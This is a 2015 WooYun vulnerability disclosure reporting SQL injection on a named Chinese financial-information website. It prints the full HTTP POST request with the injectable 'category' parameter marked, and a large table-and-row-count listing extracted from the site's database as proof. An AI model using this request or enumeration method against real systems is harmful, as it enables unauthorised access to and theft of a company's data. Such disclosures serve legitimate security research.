当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144987

漏洞标题:泛华普益主站SQL注入漏洞(百万数据泄露)

相关厂商:pywm.com.cn

漏洞作者: 路人甲

提交时间:2015-10-06 14:12

修复时间:2015-10-13 09:00

公开时间:2015-10-13 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

POST /issue_product---page--19.html HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.pywm.com.cn/success_case---index.html
Cookie: PHPSESSID=b8404140288f2bbfadd81c4d01ad6a56
Host: www.pywm.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%c9%b8%d1%a1&category=1*&duration=&issue_way=&sale_state=&start_point=s


category存在注入

注入点.png


漏洞证明:

涉及42个库

dbs.png


涉及大量数据

Database: product
+-------------------------------------+---------+
| Table | Entries |
+-------------------------------------+---------+
| capital_flow | 56929574
| bank_product_area_back_07_0805 | 14265693
| fund_risk | 8485555 |
| stock_top_ten_change | 6334212 |
| stock_global_index | 4045602 |
| bank_product_area | 3353826 |
| fund_open_ended_value | 1965992 |
| bank_product_area_back | 1435551 |
| trust_securities_value_index | 911050 |
| front_mydata | 891716 |
| stock_cnbene_transaction | 602681 |
| macroeconomics_data | 445100 |
| stock_flow_ten_change | 432334 |
| stock_reform_info | 398185 |
| fund_equity_portfolio | 359077 |
| stock_last_newintro | 357254 |
| bank_product_comment | 327129 |
| tmp_bank_product_comment_tmp_kcx | 327129 |
| bank_products_info | 323873 |
| tmp_base_bank_data_tmp | 323869 |
| fund_money_market_value | 322686 |
| fund_open_ended_value_2 | 317430 |
| product_base_bank_data_lc | 314891 |
| stock_information_content | 312056 |
| fund_stock_holding | 295321 |
| send_message_record | 229484 |
| trust_securities_value | 228868 |
| stock_shareholders | 220929 |
| stock_cnbene_trend | 192567 |
| insurance_sellprice | 176121 |
| fund_close_ended_value | 165263 |
| stock_cahng7_ranking | 163599 |
| insurance_buyprice | 160365 |
| stock_business_analysis | 153118 |
| stock_risk_factors | 143667 |
| fund_bond_holding | 136440 |
| stock_cnbene_invest_stat | 127115 |
| bank_grade_info | 110596 |
| bank_sub_branch_intro | 107982 |
| stock_secondary_market | 92226 |
| bank_error_record | 90043 |
| bondnet | 86861 |
| stock_top_ten_voting | 83709 |
| security_net | 78967 |
| stock_main_operation | 72883 |
| stock_related_corperate | 67898 |
| stock_executive_info | 64093 |
| bank_grade_info_copy2 | 60779 |
| bank_sub_branch_intro_copy1 | 59357 |
| bank_sub_branch_intro_copy2 | 59357 |
| bank_sub_branch_intro_copy | 59355 |
| stock_fund_hold | 55569 |
| tmp_bank_product_price_kcx | 48749 |
| stock_related | 48360 |
| trust_product_level | 46526 |
| stock_dividend | 45026 |
| stock_conside_info | 41629 |
| bank_structured_product | 40151 |
| tmp_bank_structured_product_tmp_kcx | 40151 |
| fund_scale | 39707 |
| stock_cnbene_micro | 39692 |
| trust_product_info | 38397 |
| fund_assets_allocation | 38278 |
| bank_grade_info_copy | 36343 |
| trust_income | 34802 |
| bank_products_info_bak1030 | 30805 |
| stock_development | 30801 |
| stock_financial_indicators | 30473 |
| stock_change_info | 29363 |
| fund_bond_portfolio | 28951 |
| stock_equity | 27631 |
| stock_cnbene_rating | 27459 |
| stock_executives_part_time | 26400 |
| bond_rate | 25629 |
| stock_profit_profitability | 25020 |
| stock_per_index | 25005 |
| stock_cash_flow | 24921 |
| stock_operate_development | 24921 |
| stock_org_sharehold | 21848 |
| stock_industry_analysis | 20772 |
| macro_index_calendar | 19677 |
| stock_dividend_baseinfo | 17419 |
| stock_financial_return | 17401 |
| stock_financial_transaction | 15669 |
| fund_fixed_investment | 15628 |
| statistics_trust_detail | 15611 |
| insurance_uni_clearrate | 14599 |
| bank_products_info_useforei | 12957 |
| stock_cnbene_bruntinfo | 12660 |
| fund_front_expense | 11062 |
| bank_products_bak_info | 10752 |
| fund_product_ranking | 10466 |
| stock_business_info | 10299 |
| stock_cnbene_finace | 9536 |
| bank_redemption_fee | 7995 |
| common_index | 7378 |
| trust_company_rank | 6643 |
| common_index_rate | 5984 |
| bank_rank | 5877 |
| trust_institute_info | 5867 |
| fund_back_expense | 5513 |
| trust_income_new | 5342 |
| tmp_trust | 5223 |
| trust_purchasing_note | 4988 |
| fund_management_duration | 4961 |
| bond_transaction | 4665 |
| trust_product_duration | 4377 |
| fund_dividend | 4002 |
| trust_director_info | 3847 |
| macro_event_notice | 3393 |
| city | 3290 |
| city_bak | 3286 |
| tmp_denglei_test_tmp | 3272 |
| fund_benchmark | 3051 |
| credit_product_info | 2913 |
| bond_products_info | 2883 |
| stock_company_info | 2495 |
| stock_code_industry | 2471 |
| bank_capital_user | 2459 |
| stock_information | 2446 |
| stock_area_type | 2350 |
| fund_description | 2298 |
| fund_product_info | 2294 |
| bank_bond_ratepay | 2287 |
| stock_rights_issues | 2162 |
| trust_product_star | 2118 |
| macroeconomics_guideline_bak | 2102 |
| macroeconomics_guideline_bak1030 | 2101 |
| trust_yield_allocation | 2100 |
| insurance_info | 2042 |
| trust_liquidation_total | 2036 |
| stock_additional_info | 2034 |
| insurance_info_bak20111221 | 2014 |
| report_all_info | 1926 |
| flt_message | 1915 |
| front_group_stock | 1840 |
| bank_excel_log | 1762 |
| bank_branch_intro | 1744 |
| common_index2 | 1720 |
| insurance_product_info | 1662 |
| fund_manager | 1652 |
| bank_grade_info_copy1 | 1608 |
| setup_message_temp | 1599 |
| credit_bankrate_info | 1572 |
| trust_add_project | 1567 |
| credit_bankrate_info_wy | 1558 |
| fund_management_duration_copy | 1535 |
| trust_securities_info | 1522 |
| bank_error_record2 | 1372 |
| fund_external_type | 1360 |
| front_stocksearchcount | 1348 |
| insurance_payment | 1223 |
| yi_tmp | 1145 |
| bank_purchase_fee | 1112 |
| trust_executive_info | 1105 |
| trust_shareholder_info | 1062 |
| fund_rank_info | 1047 |
| fund_company_ranking | 1012 |
| pyfund_fund_risk_level | 931 |
| flt_answer | 922 |
| trust_self_long_equity | 879 |
| insurance_link | 748 |
| insurance_attach | 737 |
| address_list_info | 726 |
| institute | 709 |
| front_answer | 688 |
| fund | 665 |
| front_questions | 659 |
| sz_index | 530 |
| trust_manager_info | 494 |
| macroeconomics_guideline | 479 |
| bank_head_office_intro | 450 |
| tmp_report_lccp_alluse_tmp | 429 |
| trust_return_rate | 426 |
| insurance_fee_new | 418 |
| banknet_value_error | 408 |
| trust_fee_info | 399 |
| bank_risk | 395 |
| trust_investment_consultant | 382 |
| trust_capital_field | 376 |
| trust_self_capital_field | 370 |
| trust_staff_age | 370 |
| trust_staff_eduation | 370 |
| trust_balance_sheet_right | 369 |
| trust_regist_capital | 369 |
| trust_balance_sheet_liabilities | 368 |
| trust_capital_manner | 368 |
| trust_profit_sheet | 368 |
| trust_self_capital_risk | 368 |
| trust_company_income | 367 |
| trust_self_assets_rate | 365 |
| trust_self_capital_invest | 365 |
| trust_balance_sheet_assets | 362 |
| trust_post_info | 347 |
| trust_self_asset_profit | 344 |
| bank_fund_like_product | 315 |
| security_product_info | 313 |
| trust_self_blance_right | 312 |
| fund_value_split | 311 |
| bank_fx_deposit_rate | 306 |
| macroeconomics_repurchase_rate | 288 |
| macroeconomics_bank_bill | 253 |
| statistics_trust_rank_result | 245 |
| credit_class_org | 243 |
| security_manager | 233 |
| macro_holiday | 232 |
| bank_excel_log_copy | 231 |
| bank_bond_info | 225 |
| bank_head_office_intro_copy0414 | 214 |
| trust_history_event | 205 |
| insurance_account | 204 |
| trust_product_comment | 178 |
| trust_asset_final_stock | 168 |
| company_external | 166 |
| product_chinabank_usefor_libo | 153 |
| front_answer_del | 150 |
| trust_error_record | 145 |
| tmp_bank_huilv_tmp_wjy | 144 |
| card_telephone_clean | 122 |
| front_questions_stock | 121 |
| fund_portfolio_product | 116 |
| insurance_companies | 108 |
| sdb_recommend_form | 108 |
| front_questions_del | 104 |
| fund_company_shareholding | 95 |
| bank_bond_product | 91 |
| issue_product | 86 |
| fund_company | 81 |
| address_admin | 80 |
| bank_subscription_fee | 74 |
| recommend_level_form | 72 |
| trust_company_info | 70 |
| report_area_info | 63 |
| pyfund_company_risk_level | 58 |
| cninsurance | 53 |
| fund_portfolio | 50 |
| stock_industry | 50 |
| front_knowledgebase | 42 |
| product_sell_info | 41 |
| report_info | 38 |
| fund_others_consignment | 35 |
| user_product_order | 35 |
| macro_rate_data | 33 |
| legal_summary | 32 |
| bank_deposit_rate | 31 |
| issue_product_error | 31 |
| fund_sub_company | 30 |
| macro_rate | 30 |
| cnbene_event | 25 |
| tmp_bank_report | 16 |
| report | 14 |
| trust_company_history | 13 |
| statistics_trust_rank_parameter | 12 |
| trust_transfer | 12 |
| fund_foreign_trustee | 10 |
| fund_search_item | 9 |
| flt_staff | 7 |
| security_attachment | 7 |
| indexpic_info | 5 |
| insurance_universal_premium | 5 |
| bank_manager_info | 4 |
| front_questionstype | 4 |
| secutity_dividend | 4 |
| tmp_bank_quanzhong | 4 |
| tmp_bank_report_jiqi | 4 |
| trust_major_shareholder | 4 |
| bank_report_data | 3 |
| bond_name | 3 |
| front_group | 3 |
| insurance_benefit | 3 |
| insurance_uni_lined_quit | 3 |
| insurance_uni_recevied | 3 |
| bank_transfer | 2 |
| front_accesscontrol_stock | 2 |
| insurance_fee | 2 |
| tmp_trust_week | 2 |
| trust_company_accounting | 2 |
| bank_fund_product | 1 |
| bank_product_commment_testlibo | 1 |
| client_menu | 1 |
| fund_account_alteration | 1 |
| insurance_added_premium | 1 |
| insurance_linked_basefee | 1 |
+-------------------------------------+---------+


就不深入了

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-13 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论